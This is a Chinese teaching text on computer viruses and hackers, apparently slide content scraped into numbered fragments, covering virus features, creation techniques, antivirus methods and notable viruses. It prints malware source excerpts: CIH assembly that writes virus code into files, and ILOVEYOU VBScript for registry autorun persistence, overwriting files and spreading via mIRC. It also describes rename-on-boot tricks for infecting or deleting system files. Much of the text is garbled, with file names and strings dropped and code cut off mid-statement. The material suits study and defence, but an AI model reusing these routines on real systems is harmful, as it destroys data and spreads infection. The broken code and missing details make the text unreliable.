第4章 計算機病毒與黑客(94)

1、第4章 計算機病毒與黑客4.1 計算機病毒的概述4.2 計算機病毒制作技術(shù)4.3 計算機殺毒軟件制作技術(shù)4.4 蠕蟲病毒分析4.5 特洛伊木馬4.6 計算機病毒與黑客的防范 4.1 計算機病毒的概述4.1.1 計算機病毒的定義 中華人民共和國計算機信息系統(tǒng)安全保護條例對病毒定義表明了計算機病毒就是具有破壞性的計算機程序。 計算機病毒的特征 1破壞性。 2隱蔽性。 3傳染性。熊貓燒香病毒 計算機病毒的破壞性、隱蔽性、傳染性是計算機病毒的基本特征。 4潛伏性。 5可觸發(fā)性。 6不可預(yù)見性。4.1.3 計算機病毒的產(chǎn)生原因 1軟件產(chǎn)品的脆弱性是產(chǎn)生計算機病毒根本的技術(shù)原因 2社會因素是產(chǎn)生計算機病毒

2、的土壤 病毒不是來源于突發(fā)或偶然的原因。一次突發(fā)的停電和偶然的錯誤，會在計算機的磁盤和內(nèi)存中產(chǎn)生一些亂碼和隨機指令，但這些代碼是無序和混亂的，病毒則是一種比較完美的，精巧嚴(yán)謹(jǐn)?shù)拇a，按照嚴(yán)格的秩序組織起來，與所在的系統(tǒng)網(wǎng)絡(luò)環(huán)境相適應(yīng)和配合起來，病毒不會通過偶然形成，并且需要有一定的長度，這個基本的長度從概率上來講是不可能通過隨機代碼產(chǎn)生的。現(xiàn)在流行的病毒是由人為故意編寫的，多數(shù)病毒可以找到作者和產(chǎn)地信息，從大量的統(tǒng)計分析來看，病毒作者主要情況和目的是：一些天才的程序員為了表現(xiàn)自己和證明自己的能力，出于對上司的不滿，為了好奇，為了報復(fù)，為了祝賀和求愛，為了得到控制口令，為了軟件拿不到報酬預(yù)留的陷

3、阱等當(dāng)然也有因政治，軍事，宗教，民族專利等方面的需求而專門編寫的，其中也包括一些病毒研究機構(gòu)和黑客的測試病毒 4.1.4 計算機病毒的傳播途徑 計算機病毒主要是通過復(fù)制文件、發(fā)送文件、運行程序等操作傳播的。通常有以下幾種傳播途徑： 1移動存儲設(shè)備 包括硬盤、移動硬盤、光盤等。硬盤是數(shù)據(jù)的主要存儲介質(zhì)，因此也是計算機病毒感染的主要目標(biāo)。 2網(wǎng)絡(luò) 目前大多數(shù)病毒都是通過網(wǎng)絡(luò)進行傳播的，破壞性很大。4.1.5 計算機病毒的分類 我們把計算機病毒大致歸結(jié)為7種類型。 1引導(dǎo)型病毒。主要通過感染軟盤、硬盤上的引導(dǎo)扇區(qū)或改寫磁盤分區(qū)表（FAT）來感染系統(tǒng)。早期的計算機病毒大多數(shù)屬于這類病毒。 2文件型病毒

4、。它主要是以感染COM、EXE等可執(zhí)行文件為主，被感染的可執(zhí)行文件在執(zhí)行的同時，病毒被加載并向其它正常的可執(zhí)行文件傳染或執(zhí)行破壞操作。文件型病毒大多數(shù)也是常駐內(nèi)存的。 3宏病毒。宏病毒是一種寄存于微軟Office的文檔或模板的宏中的計算機病毒，是利用宏語言編寫的。由于Office軟件在全球存在著廣泛的用戶，所以宏病毒的傳播十分迅速和廣泛。 4蠕蟲病毒。蠕蟲病毒與一般的計算機病毒不同，它不采用將自身拷貝附加到其它程序中的方式來復(fù)制自己，也就是說蠕蟲病毒不需要將其自身附著到宿主程序上。蠕蟲病毒主要通過網(wǎng)絡(luò)傳播，具有極強的自我復(fù)制能力、傳播性和破壞性。 5特洛伊木馬型病毒。特洛伊木馬型病毒實際上就是

5、黑客程序，一般不對計算機系統(tǒng)進行直接破壞，而是通過網(wǎng)絡(luò)控制其它計算機，包括竊取秘密信息，占用計算機系統(tǒng)資源等現(xiàn)象。 6網(wǎng)頁病毒。網(wǎng)頁病毒一般也是使用腳本語言將有害代碼直接寫在網(wǎng)頁上，當(dāng)瀏覽網(wǎng)頁時會立即破壞本地計算機系統(tǒng)，輕者修改或鎖定主頁，重者格式化硬盤，使你防不勝防。 7混合型病毒。兼有上述計算機病毒特點的病毒統(tǒng)稱為混合型病毒，所以它的破壞性更大，傳染的機會也更多，殺毒也更加困難。 有多種分類方法：根據(jù)病毒存在的媒體可分為網(wǎng)絡(luò)病毒，文件病毒，引導(dǎo)型病毒。 根據(jù)病毒傳染的方法可分為駐留型病毒和非駐留型病毒。按病毒破壞的能力可分為無害型、無危險型、危險型、非常危險型。按病毒的算法可分為伴隨型病毒

6、，“蠕蟲”型病毒，寄生型病毒、詭秘型病毒（它們一般不直接修改DOS中斷和扇區(qū)數(shù)據(jù)，而是通過設(shè)備技術(shù)和文件緩沖區(qū)等DOS內(nèi)部修改，不易看到資源，使用比較高級的技術(shù)。利用DOS空閑的數(shù)據(jù)區(qū)進行工作。）、變型病毒（又稱幽靈病毒） （這一類病毒使用一個復(fù)雜的算法，使自己每傳播一份都具有不同的內(nèi)容和長度。它們一般的作法是一段混有無關(guān)指令的解碼算法和被變化過的病毒體組成）。 4.1.6 計算機病毒的表現(xiàn)現(xiàn)象 1.計算機系統(tǒng)運行速度減慢。 2.計算機系統(tǒng)經(jīng)常無故發(fā)生死機。 3.計算機系統(tǒng)中的文件長度發(fā)生變化。 4.計算機存儲的容量異常減少。 5.系統(tǒng)引導(dǎo)速度減慢。 6.丟失文件或文件損壞。 7.計算機屏幕上

7、出現(xiàn)異常顯示。 8.計算機系統(tǒng)的蜂鳴器出現(xiàn)異常聲響。 9.磁盤卷標(biāo)發(fā)生變化。 10.系統(tǒng)不識別硬盤。 11.對存儲系統(tǒng)異常訪問。 12.鍵盤輸入異常。 13.文件的日期、時間、屬性等發(fā)生變化。 14.文件無法正確讀取、復(fù)制或打開。 15.命令執(zhí)行出現(xiàn)錯誤。 16.虛假報警。 17.換當(dāng)前盤。有些病毒會將當(dāng)前盤切換到C盤。 18.時鐘倒轉(zhuǎn)。有些病毒會命名系統(tǒng)時間倒轉(zhuǎn)，逆向計時。 操作系統(tǒng)無故頻繁出現(xiàn)錯誤?；驘o法正常啟動。20.系統(tǒng)異常重新啟動。 21.一些外部設(shè)備工作異常。如打印和通訊發(fā)生異常。 22.異常要求用戶輸入密碼。 或EXCEL提示執(zhí)行“宏”。 24.不應(yīng)駐留內(nèi)存的程序駐留內(nèi)存。 25

8、平時運行正常的計算機突然經(jīng)常性無緣無故地死機。 26收到陌生人發(fā)來的電子郵件。 27自動鏈接到一些陌生的網(wǎng)站。 28網(wǎng)絡(luò)癱瘓。 4.1.7 計算機病毒程序一般構(gòu)成 病毒程序一般由三個基本模塊組成，即安裝模塊、傳染模塊和破壞模塊。 1安裝模塊 病毒程序必須通過自身的程序?qū)崿F(xiàn)自啟動并安裝到計算機系統(tǒng)中，不同類型的病毒程序會使用不同的安裝方法。 2傳染模塊 傳染模塊包括三部分內(nèi)容： （1）傳染控制部分。病毒一般都有一個控制條件，一旦滿足這個條件就開始感染。例如，病毒先判斷某個文件是否是.EXE文件，如果是再進行傳染，否則再尋找下一個文件； （2）傳染判斷部分。每個病毒程序都有一個標(biāo)記，在傳染時將判斷

9、這個標(biāo)記，如果磁盤或者文件已經(jīng)被傳染就不再傳染，否則就要傳染了； （3）傳染操作部分。在滿足傳染條件時進行傳染操作。 3破壞模塊 計算機病毒的最終目的是進行破壞，其破壞的基本手段就是刪除文件或數(shù)據(jù)。破壞模塊包括兩部分：一是激發(fā)控制，另一個就是破壞操作。 對每個病毒程序來說，安裝模塊、傳染模塊是必不可少的，而破壞模塊可以直接隱含在傳染模塊中，也可以單獨構(gòu)成一個模塊。 計算機病毒程序工作的一般流程用類C語言描述如下：/*引導(dǎo)功能模塊*/將病毒程序寄生于宿主程序中；加載計算機程序；病毒程序隨其宿主程序的運行進入系統(tǒng)；傳染功能模塊；破壞功能模塊；main()調(diào)用引導(dǎo)功能模塊；A：do 尋找傳染對象；

10、if(傳染條件不滿足)goto A； while(滿足傳染條件)； 調(diào)用傳染功能模塊；while(滿足破壞條件) 激活病毒程序；調(diào)用破壞功能模塊； 運行宿主源程序； if 不關(guān)機 goto A； 關(guān)機；計算機病毒程序工作的N-S圖如右圖 4.2 計算機病毒制作技術(shù) 1采用自加密技術(shù) 計算機病毒采用自加密技術(shù)就是為了防止被計算機病毒檢測程序掃描出來，并被輕易地反匯編。這對分析和破譯計算機病毒等工作都增加了很多困難。 2采用變形技術(shù) 計算機病毒編制者通過修改某種已知計算機病毒的代碼，使其能夠躲過現(xiàn)有計算機病毒檢測程序時，稱這種新出現(xiàn)的計算機病毒是原來被修改計算機病毒的變形或變種。 3采用特殊的隱形

11、技術(shù) 當(dāng)計算機病毒采用特殊的隱形技術(shù)后，可以在計算機病毒進入內(nèi)存后，使計算機用戶幾乎感覺不到它的存在。采用這種“隱形”技術(shù)的計算機病毒化裝成了正常表現(xiàn)形式。 4對抗計算機病毒防范系統(tǒng) 當(dāng)有某些著名的計算機病毒殺毒軟件或在文件中查找到出版這些軟件的公司名時，就會刪除這些殺毒軟件或文件等。 5反跟蹤技術(shù) 計算機病毒采用反跟蹤措施的目的是要提高計算機病毒程序的防破譯能力和偽裝能力。常規(guī)程序使用的反跟蹤技術(shù)在計算機病毒程序中都可以利用。 6利用中斷處理機制 病毒設(shè)計者篡改中斷處理功能為達到傳染、激發(fā)和破壞等目的。如INT 13H是磁盤輸入輸出中斷，引導(dǎo)型病毒就是用它來傳染病毒和格式化磁盤的。 7 Wi

12、ndows病毒編制的關(guān)鍵技術(shù)(1) 利用文件技術(shù) 文件屬于Windows啟動配置文件，主要用于對一些在Windows運行過程中無法進行刪除、更名或更新等操作的文件在啟動過程中進行上述操作，它存在的時間很短，操作完成后即被自動刪除。文件有3個可能的段，其中“rename”段的格式為：renamefilename1=filename2行“filename1=filename2”相當(dāng)于依次執(zhí)行“copy filename2 filename1”及“del filename2”這兩個DOS命令。 啟動時，Windows將用filename2覆蓋filename1，再刪除filename2，這就實現(xiàn)了用

13、filename2更新filename1的目的，如果filename1不存在，實際結(jié)果是將filename2改名為filename1；如果要刪除文件，可令filename1為nul。 在Windows中，一個可執(zhí)行文件如果正在運行或某個庫文件（*.dll、*.vxd、*.sys等）正在被打開使用，則不能被改寫或刪除。例如，在資源管理器中無法刪除，或者在Windows的GDI界面下，刪除顯示驅(qū)動程序庫文件、文件子系統(tǒng)庫文件等。若要對這些文件進行升級，改動，就必須在Windows保護模式核心啟動前進行，即利用基于文件的一個機制來完成這個任務(wù)。 這個機制是：將刪除或改寫這類文件的應(yīng)用程序按一定的格式

14、把命令寫入 ，Windows在重啟時，將在Windows目錄下搜索文件，如果找到，就遵照該文件指令刪除、改名、更新文件，完成任務(wù)后，將刪除文件本身，繼續(xù)啟動過程。所以文件中的指令只會被執(zhí)行一次，列目錄時也通常沒有它的蹤影。 Windows病毒在感染文件時，也碰到了這樣一個問題，某些文件，因為系統(tǒng)正在使用，不能被改寫和感染，早期的Windows病毒如CIH病毒采用VxD技術(shù)來解決這個問題，這易造成系統(tǒng)不穩(wěn)定，后期的病毒大多采用Windows提供的標(biāo)準(zhǔn)方法文件來解決這個問題。 如下幾種新出現(xiàn)的Windows病毒即使用了這種方法。1） “Win32.Kriz”病毒又叫“圣誕節(jié)”病毒，內(nèi)存駐留型，具有

15、多形性且極端危險，在12月25日發(fā)作時將改寫CMOS，覆蓋所有驅(qū)動器上的所有文件，然后用CIH病毒中的同樣程序破壞主板上Flash BIOS，該病毒感染exe（PE格式，即Portable Executable File Format，可移植的執(zhí)行體）和scr文件，同時為了監(jiān)控所有文件操作，它感染，接管文件復(fù)制、打開、移動等文件存取函數(shù)，由于文件在Windows運行時只能以只讀方式打開，為感染它，該病毒將它復(fù)制一份，名為，然后感染復(fù)制品，寫Rename指令到文件中，下次機器啟動時，將替代原來的完成感染。2） 蠕蟲“Supp1.A”是一個Word宏蠕蟲，通過在發(fā)出的E-mail中插入一個特洛伊文

16、檔作為附件傳播。當(dāng)被打開時病毒復(fù)制文檔到，把要展開的數(shù)據(jù)寫到文件，并解壓為，以上文件都放在Windows目錄下。接下來這個蠕蟲創(chuàng)建一個具有如下內(nèi)容的文件。renamenul=該病毒將把硬盤上doc、xls、txt、rif、zip、arj、rar等類型文件長度置03） Heathen病毒“Heathen病毒”是一個多平臺病毒，感染W(wǎng)ord文檔和PE格式的exe文件。為了感染，病毒先把復(fù)制為，然后加一條“rename”指令到文件，例如：rename=下次啟動時，Windows將幫助它完成對的感染。另外，該病毒發(fā)作時也使來刪除Windows注冊表文件:renamenul=nul=4） “Win95.

17、SK”是最兇狠、最狡猾的病毒之一，原有一些BUG，現(xiàn)在已出現(xiàn)了更新版本，糾正了第一個版本中的所有BUG。它是一個寄生性的Windows病毒，可感染W(wǎng)indows PE格式文件、HLPE幫助文件、壓縮包文件（rar、xip、arj、ha）。它采用了許多新的高級技術(shù)，如：自身加密解密技術(shù)，入口點隱藏技術(shù)等，當(dāng)磁盤上文件被訪問時，它檢查其文件名，如果是幾個反病毒程序的名字（DINF、AVPI、AVP、VBA、DRWEB），該病毒將刪除從C：盤到Z：盤的所有目錄下的所有能被刪除的文件，然后，調(diào)用函數(shù)Fatal_Error_Handler使系統(tǒng)死機。 Windows Shell文件是Windows病毒必

18、爭之地，該病毒自然不會放過，但比其他病毒更加完善，它通過從文件中的“Shell=”行來獲得Shell文件名，這樣，即使將改名，在Shell中指定實際的文件名，期望借此避免被感染，也是徒勞，它感染Shell文件的具體步驟是：以為例，把復(fù)制為，然后感染、再創(chuàng)建文件，寫入合適的rename指令，這與其他病毒的作法相同。(2) 利用注冊表技術(shù) 注冊表是一個龐大的數(shù)據(jù)庫，用來存儲計算機軟硬件的各種配置數(shù)據(jù)。注冊表中記錄了用戶安裝在計算機上的軟件和每個程序的相關(guān)信息，用戶可以通過注冊表調(diào)整軟件的運行性能、檢測和恢復(fù)系統(tǒng)錯誤、定制桌面等。因而掌握了注冊表，即掌握了對計算機配置的控制權(quán)。因此，病毒程序可以通過

19、修改、掌握注冊表，來達到控制計算機的目的。 這類方法常用的有修改注冊表的鍵值、鎖定注冊表等。(3) 虛擬設(shè)備驅(qū)動程序（VxD） VxD是一個管理如硬件設(shè)備或者已安裝軟件等系統(tǒng)資源的32位可執(zhí)行程序，使得幾個應(yīng)用程序可以同時使用這些資源。Windows通過使用VxD允許基于Windows的應(yīng)用程序?qū)崿F(xiàn)多任務(wù)。VxD在與Windows的連接工作中處理中斷，并為需要進行I/O操作的應(yīng)用程序執(zhí)行I/O操作，而且不影響其他應(yīng)用程序的執(zhí)行。大多數(shù)VxD管理硬件設(shè)備，也有一些VxD管理或代替與之相關(guān)的軟件，例如普通ROM BIOS。 其實，VxD不僅僅可以用來控制硬件設(shè)備，因為VxD工作在80386保護模式

20、Ring 0特權(quán)級（最高特權(quán)級）上，而一般的應(yīng)用程序工作在Ring 3特權(quán)級（最低特權(quán)級）上，所以VxD可以完成許多API不能完成的功能，例如端口讀寫、物理內(nèi)存讀寫、中斷調(diào)用、API攔截等。因此，在Windows系統(tǒng)的病毒編制技術(shù)中，通過編制一個VxD病毒程序或編制一小段病毒程序代碼來來激活一個動態(tài)VxD，使得系統(tǒng)癱瘓，也是常見方法之一。由于Windows系統(tǒng)對VxD的行為沒有限制，因此VxD病毒可以繞過所采用的任何保機制，所以此種病毒相當(dāng)惡毒。 此類典型病毒即為CIH病毒。該病毒使用面向Windows的VxD技術(shù)編制，主要感染W(wǎng)indows操作系統(tǒng)下的可執(zhí)行文件（exe、com、vxd、vx

21、e），并且在DOS、及Windows NT中無效，感染后的文件大小根本沒有變化，病毒代碼的大小在1KB左右。由于CIH病毒獨特地使用了VxD技術(shù)，使得這種病毒在Windows環(huán)境下傳播，使用一般反病毒軟件很難發(fā)現(xiàn)這種病毒在系統(tǒng)中的傳播。CIH病毒程序部分代碼如下：lea eax, (LastVxDCallAddress-2-9)esi;上一個調(diào)用VxD的指令的地址 mov cl, VxDCallTableSize ;所用VxD調(diào)用的個數(shù) LoopOfRestoreVxDCallID: mov word ptr eax, 20cdh;還原成int 20h的形式 mov edx, (VxDCall

22、IDTable+(ecx-1)*04h-9)esi ;從VxDCallIDTable取出VxD調(diào)用的id號放到edxmov eax+2, edx;放到int 20h的后面,形成int 20h and the Service Identifier的形式 movzx edx, byte ptr (VxDCallAddressTable+ecx19)esi ;VxDCallAddressTable中放著各個調(diào)用VxD的指令的地址之差 sub eax, edx;eax為上一個調(diào)用地址 loop LoopOfRestoreVxDCallID ;還原其他的調(diào)用WriteVirusCodeToFile: m

23、ov eax, dr1;dr1為前面所保存的esp mov ebx, eax+10h;ebx為保存在棧中的保存文件句柄 mov edi, eax;edi為保存在棧中的IFSMgr_Ring0_FileIO調(diào)用的地址 LoopOfWriteVirusCodeToFile: pop ecx;病毒代碼各段的偏移 jecxz SetFileModificationMark;到病毒偏移零為止 mov esi, ecx mov eax, 0d601h;寫文件功能號(R0_WRITEFILE) pop edx;文件指針 pop ecx;要寫的字節(jié)數(shù) call edi;VxDCall IFSMgr_Ring0

24、_FileIO;寫文件,依次寫入:各段病毒代碼,病毒塊表,新的文件塊表,新的程序入口,感染標(biāo)志 jmp LoopOfWriteVirusCodeToFile在CIH病毒代碼中，全部系統(tǒng)調(diào)用都是采用VxD調(diào)用，這種方法編制的病毒代碼與其他方法編制的病毒代碼比較而言，病毒代碼更加底層，效率更高。特別是和用API函數(shù)編制的病毒相比不需考慮病毒自身的復(fù)雜重定位過程，和使用中斷編制的病毒相比更能防止對程序的跟蹤分析。CIH病毒分為駐留、感染、發(fā)作3個主要模塊。病毒感染時查找感染對象文件的各塊之間的空白區(qū)域，把病毒自己的各種數(shù)據(jù)結(jié)構(gòu)和代碼寫到其中。病毒的有關(guān)操作需要0級的權(quán)限，所以病毒一開始就設(shè)法獲得0級

25、權(quán)限，監(jiān)測駐留情況，用VxD調(diào)用分配內(nèi)存，并完成駐留。隨后病毒安裝文件系統(tǒng)鉤子程序(指向感染模塊)，并保存原來的鉤子指針，鉤子程序?qū)⒃谒械奈募僮髦斜患せ睿袛嗍欠裨诖蜷_文件，如是就打開并傳染之。病毒發(fā)作時，該模塊會覆蓋硬盤中的絕大多數(shù)數(shù)據(jù)和Flash BIOS中的數(shù)據(jù)。只要計算機的微處理器是Pentium Intel 430TX，一旦Flash BIOS被覆蓋掉，那么機器將不能啟動，只有將Flash BIOS進行重寫之后才行。(4) 其他編制技術(shù) 在Windows病毒編制技術(shù)中，除了上述幾種典型技術(shù)外，還有另外一些方法也較常用，例如，有的病毒程序?qū)Τ绦蝈e誤進行屏蔽，使得錯誤程序繼續(xù)執(zhí)行，

26、從而引起系統(tǒng)損壞。還有的病毒程序是對系統(tǒng)進程進行控制，通過注冊遠(yuǎn)程線程的方法，使得系統(tǒng)進程無限循環(huán)，進程堆積，機器效率逐漸變低，最后使得系統(tǒng)癱瘓。對于郵件型病毒，可以通過提取Windows地址簿文件（*.wab）的E-mail信息，不斷發(fā)送郵件，造成系統(tǒng)災(zāi)難。(1) “紅色代碼”病毒“紅色代碼”是一種專門攻擊以及Windows 2000系統(tǒng)的惡性網(wǎng)絡(luò)蠕蟲VirtualRoot（虛擬目錄）病毒。該病毒利用微軟Index Server(ida/idq)ISAPI擴展遠(yuǎn)程溢出漏洞，通過80端口發(fā)送一個構(gòu)造后的HTTP GET請求到服務(wù)器，當(dāng)本地IIS服務(wù)程序收到某個來自CodeRedII發(fā)的請求數(shù)據(jù)

27、包時，由于存在漏洞，導(dǎo)致處理函數(shù)的堆棧溢出（Overflow）。當(dāng)函數(shù)返回時，原返回地址已被病毒數(shù)據(jù)包覆蓋，系統(tǒng)強迫運行病毒代碼，此時病毒被激活，并運行在IIS服務(wù)程序的堆棧中。8.典型Windows病毒分析 這種蠕蟲病毒修改Windows注冊表并放置特洛伊木馬程序（將改名為），并將文件復(fù)制到別的目錄，這些目錄包括，; ; c:program filescommon filessystem; d:program filescommon filessystem. 顯然原來的的文件被從Windows NT的System目錄復(fù)制到了別的目錄，給黑客的入侵敞開了大門。不僅如此，該網(wǎng)絡(luò)蠕蟲程序還會修改系

28、統(tǒng)的注冊表項目：HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVICESW3 SVCPARAMETERSVIRTUALROOTS 通過該項目的修改，該蠕蟲程序可以建立虛擬的目錄C或者D，病毒名由此而來。受感染的機器可由黑客們通過HTTP GET的請求運行scripts/來獲得對受感染機器的完全的控制權(quán)。該網(wǎng)絡(luò)蠕蟲的主線程檢查2個不同的標(biāo)記：第一個標(biāo)記是29A（29A是國外最著名的病毒編寫組織的代號），該標(biāo)記控制該網(wǎng)絡(luò)蠕蟲程序的安裝；第二個標(biāo)記是檢查是否有“CodeRed II”，如果存在的話，該網(wǎng)絡(luò)蠕蟲程序進入無限的休眠狀態(tài)。 病毒激活時，網(wǎng)絡(luò)蠕蟲程序

29、會檢查當(dāng)前的系統(tǒng)的語言，如果默認(rèn)的語言是漢字系統(tǒng)，不管是簡體的還是繁體的漢字系統(tǒng)，它會建立600個新的線程；如果不是這兩種系統(tǒng)語言的話，該網(wǎng)絡(luò)蠕蟲程序建立300個線程。每一個線程產(chǎn)生一組隨機的IP地址，并尋找其中可以感染的目標(biāo)機器。這些線程不斷感染別的機器，當(dāng)感染一臺服務(wù)器成功了以后，如果受感染的機器是中文系統(tǒng)，該程序會休眠2天，別的機器休眠1天。當(dāng)休眠的時間到了以后，該蠕蟲程序會使得機器重新啟動。同時該蠕蟲也會檢查機器的月份是否是10月或者年份是否是2002年，如果是的話，受感染的服務(wù)器也會重新啟動。 當(dāng)Windows NT系統(tǒng)啟動時，NT系統(tǒng)會自動搜索C盤根目錄下的文件。受該網(wǎng)絡(luò)蠕蟲程序感

30、染的服務(wù)器上的文件，也就是該網(wǎng)絡(luò)蠕蟲程序本身。該文件的大小是8192B，該網(wǎng)絡(luò)蠕蟲程序就是通過該程序來執(zhí)行的。 它同時還會修改系統(tǒng)的注冊表項目： HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWS NTCURRENTVERSION WINLOGON 將其中的數(shù)值SFCDisable設(shè)置成 0 xFFFFFF9D ,使得系統(tǒng)啟動時不檢查系統(tǒng)文件的完整性。(2) “I LOVE YOU”病毒 “I LOVE YOU”病毒是用vbscript寫出來的通過E-mail散布的病毒。打開郵件的附件時，含有病毒的腳本程序運行，該病毒首先將自身復(fù)制到下列目錄中：$windir

31、/Win32DLL.vbs ($windir = c:windows on most windows systems)$systemdir/MSKernel32.vbs ($systemdir = c:windowssystem)然后將這些文件加載到注冊表中以便在啟動時自動運行。并且改變默認(rèn)的IE瀏覽頁面，通過該頁面可下載一個可執(zhí)行的代碼，下載完畢后再將其加入注冊表，并把IE的默認(rèn)瀏覽頁面再改為about:blank。接下來該病毒掃描硬盤及網(wǎng)絡(luò)共享硬盤，尋找后綴為vbs、vbe、js、jse、css、wsh、sct、hta、vbs、jpg、jpeg 的文件，并將所有這些文件改變成這個病毒，當(dāng)發(fā)

32、現(xiàn)有mp2或者mp3格式的文件時，將自身復(fù)制到同樣目錄下的一個vbs script中，若找到mIRC時則建立一個小的mIRC script（可以發(fā)送html頁面），這樣就可以對所有加入所在頻道的所有用戶發(fā)送html并感染對方的IE。當(dāng)感染了病毒的IE運行時，會將其共享密碼及IP地址通過E-mail發(fā)送回指定的地址。該病毒修改注冊表部分源代碼如下：Set fso = ) Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2)

33、 Set c = ) c.Copy(dirsystem&MSKernel32.vbs) c.Copy(dirwin&Win32DLL.vbs) ) Dim num,downread regcreate HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32, dirsystem&MSKernel32.vbs regcreate HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices Win32DLL,dirwin&Win32DLL.

34、vbs downread= downread=regget(HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDownload Directory) if (downread=) then downread=c: end if if (fileexist(dirsystem&WinFAT32.exe)=1) then Randomize num = Int(4 * Rnd) + 1) if num = 1 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,

35、elseif num = 2 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page, :/ num = 3 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page, :/ num = 4 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page, :/ end if end if if (fileexist(downread&WINBUGSFIX.exe)=

36、0) thenregcreate HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersio nRunWIN-BUGSFIX,downread&WIN-BUGSFIX.exe regcreate HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain Start Page,about:blank end if該病毒感染文件部分源代碼如下：On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.Ge

37、tFolder(folderspec) set fc = for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase() if (ext=vbs) or (ext=vbe) then set ap=fso.OpenTextFile(f1.path,2,true) vbscopy elseif(ext=js)or(ext=jse)or(ext=css)or(ext=wsh)or(ext=sct)or(ext=hta) then set ap=fso.OpenTextFile(f1.path,2,true)

38、vbscopy bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&bname&.vbs) fso.DeleteFile(f1.path) elseif(ext=jpg) or (ext=jpeg) then set ap=fso.OpenTextFile(f1.path,2,true) vbscopy set cop=fso.GetFile(f1.path) cop.copy(f1.path&.vbs) fso.DeleteFile(f1.path) elseif(ext=mp3) o

39、r (ext=mp2) then set mp3=fso.CreateTextFile(f1.path&.vbs) mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) =att.attributes+2 end if if (eqfolderspec) then if (s=mirc32.exe) or (s=mlink32.exe) or (s=) or (s=) or (s=) then set scriptini=) script ;mIRC Script ; Please dont edit this script. mIR

40、C will corru pt, if mIRC will corrupt. WINDOWS will affect and will not run correctly. thanks ; ;Khaled Mardam-Bey ; :/ ; n0=on 1:JOIN:#: n1= /if ( $nick = $me ) halt n2= /.dcc send $nick &dirsystem&LOVE-LETTER-FO R-YOU.HTM n3= eq=folderspec end if end if 4.3 計算機殺毒軟件制作技術(shù) 1特征代碼法 從病毒程序中抽取一段獨一無二、足以代表該病

41、毒特征的二進制程序代碼，并將這段代碼作為判斷該病毒的依據(jù)，這就是所謂的病毒特征代碼。 從各種病毒樣本中抽取特征代碼，就構(gòu)成了病毒資料庫。 顯然，病毒資料庫中病毒特征代碼種類越多，殺毒軟件能查出的病毒就越多。 選擇病毒特征碼要能夠反映出該病毒典型特征，如它的破壞、傳播和隱藏性代碼。由于病毒數(shù)據(jù)區(qū)會經(jīng)常變化，因此病毒特征代碼不要含有病毒的數(shù)據(jù)區(qū)。在保持病毒典型特征唯一性的前提下，抽取的病毒特征代碼要長度適當(dāng)，應(yīng)盡量使特征代碼長度短些，以減少空間與時間開銷，使誤報警率最低。 在檢查文件是否含有病毒時，可以先打開被檢測文件，在文件中搜索，檢查文件中是否含有與病毒數(shù)據(jù)庫中相同的病毒特征代碼。 如果發(fā)現(xiàn)文

42、件中含有病毒特征代碼，便可以斷定被查文件中患有何種病毒。 采用病毒特征代碼法的檢測工具，必須不斷更新病毒資料庫，否則檢測工具便會過期老化，逐漸失去實用價值。 特征代碼法的優(yōu)點是檢測準(zhǔn)確、快速、可識別病毒的名稱，是檢測已知病毒的最簡單、開銷最小的方法。缺點是不能檢測未知病毒、變種病毒和隱蔽性病毒（隱蔽性病毒進駐內(nèi)存后，會自動剝?nèi)ト径境绦蛑械牟《敬a），需定期更新病毒資料庫，具有滯后性。 2校驗和法 校驗和法是根據(jù)文件的內(nèi)容，計算其校驗和，并將所有文件的校驗和放在資料庫中。檢測時將文件現(xiàn)有內(nèi)容的校驗和與資料庫中的校驗和做比較，若不同則判斷為被感染病毒。運用校驗和法查病毒可以采用三種方式： （1）在

43、檢測病毒工具中加入校驗和法。 （2）在應(yīng)用程序中加入校驗和法自我檢查功能。 （3）將校驗和檢查程序常駐內(nèi)存。 3行為監(jiān)測法 行為監(jiān)測法是將病毒中比較特殊的共同行為歸納起來，例如，對文件做寫入動作，格式化硬盤動作、修改網(wǎng)頁等。當(dāng)程序運行時監(jiān)視其行為，若發(fā)現(xiàn)類似病毒的行為，立即報警。 4 虛擬機技術(shù) (軟件模擬法) 用程序代碼虛擬一個CPU、各個寄存器、硬件端口也虛擬出來，調(diào)入被調(diào)的“樣本”，通過內(nèi)存和寄存器以及端口的變化來了解程序的執(zhí)行情況。將病毒放到虛擬機中執(zhí)行，則病毒的傳染和破壞等動作一定會被反映出來。 5主動內(nèi)核技術(shù) 是主動給操作系統(tǒng)和網(wǎng)絡(luò)系統(tǒng)打了“補丁”，這些補丁將從安全的角度對系統(tǒng)或網(wǎng)

44、絡(luò)進行管理和檢查，對系統(tǒng)的漏洞進行修補，任何文件在進入系統(tǒng)之前，反病毒模塊都將首先使用各種手段對文件進行檢測處理。 6啟發(fā)掃描的反病毒技術(shù) 是以特定方式實現(xiàn)對有關(guān)指令序列的反編譯，逐步理解和確定其蘊藏的真正動機。例如，一段程序有：MOV AH , 5和 INT 13h，這段指令之前不存在取得命令行關(guān)于執(zhí)行的參數(shù)選項等，可以認(rèn)為這是一個病毒或惡意破壞的程序。 7實時反病毒技術(shù) 實時反病毒是對任何程序在調(diào)用之前都被先過濾一遍，一有病毒侵入，它就報警，并自動殺毒，將病毒拒之門外，做到防患于未然。 8郵件病毒防殺技術(shù) 采用智能郵件客戶端代理SMCP技術(shù)，該技術(shù)具有完善的郵件解碼技術(shù)，能對郵件的各個部分

